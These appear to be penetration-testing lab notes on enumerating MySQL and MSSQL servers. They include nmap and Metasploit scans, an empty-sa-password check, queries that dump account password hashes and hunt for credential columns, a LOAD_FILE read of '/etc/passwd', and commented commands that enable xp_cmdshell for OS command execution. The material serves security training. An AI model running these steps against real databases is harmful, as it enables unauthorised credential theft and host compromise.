MySQL: serves as the central instance where content required by PHP scripts is stored
Headers, texts, meta tags, forms, customers, usernames, admins, mods
Translates commands internally into executable code/performs actions
Web app informs the user if an error occurs, which various SQLi techniques can provoke
Error info confirms the web app interacts with the db in a way other than intended
Info can be data extracted from a table/records needed for processing, functions, etc.
Commands can display, modify, add, delete rows
Can also change table structure, create/delete relationships and indexes, manage users
MariaDB: often mentioned together with MySQL; a fork of the original MySQL code
sudo apt install mysql-server -y # install mysql server
cat /etc/mysql/mysql.conf.d/mysqld.cnf | grep -v "#" | sed -r '/^\s*$/d' # configs
Dangerous Settings
user # OS user mysql runs as (running as root turns a file-write primitive into full host compromise)
password # password for the mysql user, stored in cleartext in the config
admin_address # IP to listen on for connections on the admin network interface
debug # debugging settings
sql_warnings # controls whether single-row INSERT statements produce an info string when warnings occur
secure_file_priv # limits data import/export ops (LOAD DATA, SELECT ... INTO OUTFILE, LOAD_FILE): empty = unrestricted, NULL = disabled, /dir/ = that dir only
user, password, admin_address are stored in plaintext in the config: anyone who can read the file gets them
debug, sql_warnings make error output more verbose; extra info (paths, queries, versions) widens the attack surface, e.g. error-based SQLi
information_schema: ANSI/ISO standard metadata db (schemas, tables, columns, privileges); much of its content is derived from the system schema
System schema (the mysql db): MySQL's own catalog; tables the server needs at runtime (users, grants, plugins)
Both exist because information_schema follows the ANSI/ISO standard while the system schema is MySQL-specific
mysql -u user -ppassword -h IP # connect to mysql server | no space between -p and password; -p alone prompts and keeps the password out of shell history
show databases;
use database; # select a database
show tables;
show columns from table; # show all columns of the chosen table
select * from table; # show everything in table
select * from table where column = "string"; # search for string in desired table
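Added example (not part of the original notes): once logged in with the mysql client, the queries below check the dangerous settings listed above as the server actually has them, and enumerate with information_schema instead of guessing names. Nothing here assumes a specific target; the secure_file_priv and FILE privilege checks are what decide whether LOAD_FILE / INTO OUTFILE work.

```sql
-- who am I and what can I do?
SELECT USER(), CURRENT_USER(), VERSION();
SHOW GRANTS FOR CURRENT_USER();

-- dangerous settings as the running server reports them
SHOW VARIABLES WHERE Variable_name IN
  ('secure_file_priv', 'local_infile', 'sql_warnings', 'general_log',
   'general_log_file', 'log_error', 'datadir', 'plugin_dir', 'have_ssl');
-- secure_file_priv = ''    -> import/export anywhere the mysql OS user can write
-- secure_file_priv = NULL  -> import/export disabled
-- secure_file_priv = /dir/ -> limited to that directory

-- ANSI information_schema: every db, table and column, minus the built-in schemas
SELECT schema_name FROM information_schema.schemata;
SELECT table_schema, table_name, table_rows
  FROM information_schema.tables
 WHERE table_schema NOT IN ('mysql', 'information_schema', 'performance_schema', 'sys');
-- columns whose names suggest credentials
SELECT table_schema, table_name, column_name, data_type
  FROM information_schema.columns
 WHERE column_name REGEXP 'pass|pwd|secret|token|key'
   AND table_schema NOT IN ('mysql', 'information_schema', 'performance_schema', 'sys');

-- MySQL-specific system schema: accounts, auth plugin, hashes (needs SELECT on mysql.*)
SELECT user, host, plugin, authentication_string FROM mysql.user;
-- accounts that can read/write files on the db host or bypass checks
SELECT user, host, File_priv, Super_priv
  FROM mysql.user
 WHERE File_priv = 'Y' OR Super_priv = 'Y';

-- file read primitive: returns NULL if FILE priv or secure_file_priv forbid it
SELECT LOAD_FILE('/etc/passwd');
```

Run the statements one at a time from the mysql prompt; the mysql.user queries fail with a permission error for low-privileged accounts, which is itself useful information.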
MSSQL
Microsoft's SQL-based relational DBMS:
Closed source; initially written to run on Windows
MSSQL clients
SSMS: SQL Server Management Studio: feature that can be installed with MSSQL
We could come across a vulnerable system with SSMS installed and saved creds that allow access
master # tracks all system info for a SQL Server instance
model # template: structure for every new db; any changes are reflected in new dbs
msdb # SQL Server Agent uses this db to schedule jobs & alerts
tempdb # temporary objects
resource # read-only db: system objects included with SQL Server
Many clients can be used to access a db running MSSQL:
locate mssqlclient # find if/where client is on host
/usr/bin/impacket-mssqlclient
/usr/share/doc/python3-impacket/examples/mssqlclient.py
When an admin installs/configs MSSQL to be network accessible, the service runs as:
NT SERVICE\MSSQLSERVER; connecting from the client side is possible through Windows Authentication
Default: encryption not enforced
Windows processes the login request against the local SAM db or an AD DC before allowing connectivity to the DBMS
Using AD can be ideal for auditing activity/controlling access
If an account is compromised, it could lead to privesc/lateral movement (same creds valid on the db and on the domain)
# dangerous settings
-- clients not using encryption to connect (creds and queries readable on the wire)
-- self-signed certs when encryption is used (can be spoofed)
-- use of named pipes (SQL reachable over SMB/445, not only TCP 1433)
-- weak/default sa creds (admins often forget to change them)
sudo nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 10.129.201.248
| ms-sql-ntlm-info:
| Target_Name: SQL-01
| NetBIOS_Domain_Name: SQL-01
Host script results:
| ms-sql-info:
| Windows server name: SQL-01
| 10.129.201.248\MSSQLSERVER:
| Instance name: MSSQLSERVER
| Version:
| name: Microsoft SQL Server 2019 RTM
| number: 15.00.2000.00
| Product: Microsoft SQL Server 2019
| Named pipe: \\10.129.201.248\pipe\sql\query
Metasploit auxiliary scanner: auxiliary/scanner/mssql/mssql_ping (queries the SQL Server Browser service on UDP 1434 for instance names/ports)
msf6 auxiliary(scanner/mssql/mssql_ping) > set rhosts 10.129.201.248
msf6 auxiliary(scanner/mssql/mssql_ping) > run
Connecting with mssqlclient.py (Impacket)
impacket-mssqlclient Administrator@10.129.201.248 -windows-auth # -windows-auth = Windows auth instead of a SQL login; prompts for the password
SQL> select name from sys.databases
name
-----------------------------------
master
tempdb
model
msdb
Transactions
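Added example (not part of the original notes): T-SQL to run from the mssqlclient.py SQL> prompt after the connection above. It checks the dangerous settings listed earlier (auth mode, sa state, encryption on this session, xp_cmdshell) and enumerates what is useful for privesc/lateral movement. The statements use only built-in catalog views; the commented sp_configure lines need sysadmin and are shown for reference only.

```sql
-- instance, version, auth mode (1 = Windows auth only, 0 = mixed: the sa login is usable)
SELECT @@VERSION;
SELECT SERVERPROPERTY('MachineName')               AS host,
       SERVERPROPERTY('InstanceName')              AS instance,
       SERVERPROPERTY('IsIntegratedSecurityOnly')  AS windows_auth_only;

-- who am I, and am I already sysadmin?
SELECT SYSTEM_USER AS login_name, USER_NAME() AS db_user,
       IS_SRVROLEMEMBER('sysadmin') AS is_sysadmin;

-- logins: is sa enabled? which SQL logins exist (weak-password candidates)?
SELECT name, type_desc, is_disabled
  FROM sys.server_principals
 WHERE type IN ('S', 'U', 'G') AND name NOT LIKE '##%';

-- databases beyond the defaults (master, model, msdb, tempdb); TRUSTWORTHY dbs matter for privesc
SELECT name, state_desc, is_trustworthy_on FROM sys.databases;

-- is my own connection encrypted, and over which transport (TCP vs named pipe)?
SELECT session_id, net_transport, encrypt_option, auth_scheme
  FROM sys.dm_exec_connections
 WHERE session_id = @@SPID;

-- xp_cmdshell and friends: value_in_use = 1 means OS command execution is on
SELECT name, value_in_use
  FROM sys.configurations
 WHERE name IN ('xp_cmdshell', 'show advanced options', 'Ole Automation Procedures');
-- sysadmin only:
-- EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
-- EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
-- EXEC xp_cmdshell 'whoami';

-- linked servers: hop to other instances with whatever creds the link uses
SELECT name, product, provider, data_source
  FROM sys.servers
 WHERE is_linked = 1;

-- impersonation grants: logins the current principal may EXECUTE AS
SELECT p.name AS grantee, pe.permission_name, s.name AS can_impersonate
  FROM sys.server_permissions pe
  JOIN sys.server_principals p ON pe.grantee_principal_id = p.principal_id
  JOIN sys.server_principals s ON pe.major_id = s.principal_id
 WHERE pe.permission_name = 'IMPERSONATE';
```

mssqlclient.py sends one statement per prompt line, so paste these individually; an encrypt_option of FALSE on your own session confirms the "encryption not enforced" finding from the host side rather than inferring it from the nmap output.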